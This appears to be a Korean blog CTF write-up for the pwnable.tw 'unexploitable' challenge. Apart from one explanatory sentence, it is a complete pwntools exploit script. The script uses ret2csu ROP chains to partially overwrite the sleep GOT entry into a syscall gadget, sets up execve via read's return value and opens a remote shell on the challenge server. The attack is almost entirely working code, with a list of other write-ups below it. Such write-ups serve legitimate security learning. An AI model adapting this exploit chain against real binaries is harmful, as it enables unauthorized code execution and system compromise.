sleep을 syscall로 바꾼 뒤 read의 반환 값을 이용해 execve를 실행시켜주면 된다.
import sys
from pwn import *
if len(sys.argv) != 2:
print "sys.argv[1] = r : remote l : local"
exit()
#context.log_level = 'debug'
if sys.argv[1].strip() == 'l':
p = process('./unexploitable')
elif sys.argv[1].strip() == 'r':
p = remote('chall.pwnable.tw', 10403)
e = ELF('./unexploitable')
if sys.argv[1].strip() == 'l':
l = e.libc
elif sys.argv[1].strip() == 'r':
l = ELF('./libc_64.so.6')
pause()
main = 0x400544
### sleep -> syscall
payload = 'a' * 0x10 + 'b' * 8
payload += p64(0x4005E6)
payload += p64(0)
payload += p64(0)
payload += p64(1)
payload += p64(e.got['read'])
payload += p64(0)
payload += p64(e.got['sleep'])
payload += p64(50)
payload += p64(0x04005D0)
payload += p64(0) * 7
payload += p64(main)
print len(payload)
sleep(3)
p.send(payload)
sleep(1)
if sys.argv[1].strip() == 'l':
p.send(chr(0x05)) #sleep to syscall
elif sys.argv[1].strip() == 'r':
p.send(chr(0xde))
###################
payload = 'a' * 0x10 + 'b' * 8
payload += p64(0x4005E6)
payload += p64(0)
payload += p64(0)
payload += p64(1)
payload += p64(e.got['read'])
payload += p64(0)
payload += p64(e.bss() + 0x100)
payload += p64(1000)
payload += p64(0x04005D0)
payload += p64(0) * 7
payload += p64(0x4005E6)
payload += p64(0)
payload += p64(0)
payload += p64(1)
payload += p64(e.got['sleep'])
payload += p64(e.bss() + 0x100)
payload += p64(0)
payload += p64(0)
payload += p64(0x04005D0)
print len(payload)
sleep(3)#
p.send(payload)
sleep(1)
p.send('/bin/sh\x00'.ljust(59, '\x00'))
p.interactive()
'CTF write-up > pwnable.tw' 카테고리의 다른 글
| [pwnable.tw] heap_paradise (0) | 2019.11.30 |
|---|---|
| [pwnable.tw] spirited away (0) | 2019.11.13 |
| [pwnable.tw] tcache_tear (0) | 2019.11.12 |
| [pwnable.tw] secret garden (0) | 2019.11.08 |
| hacknote writeup (0) | 2019.09.11 |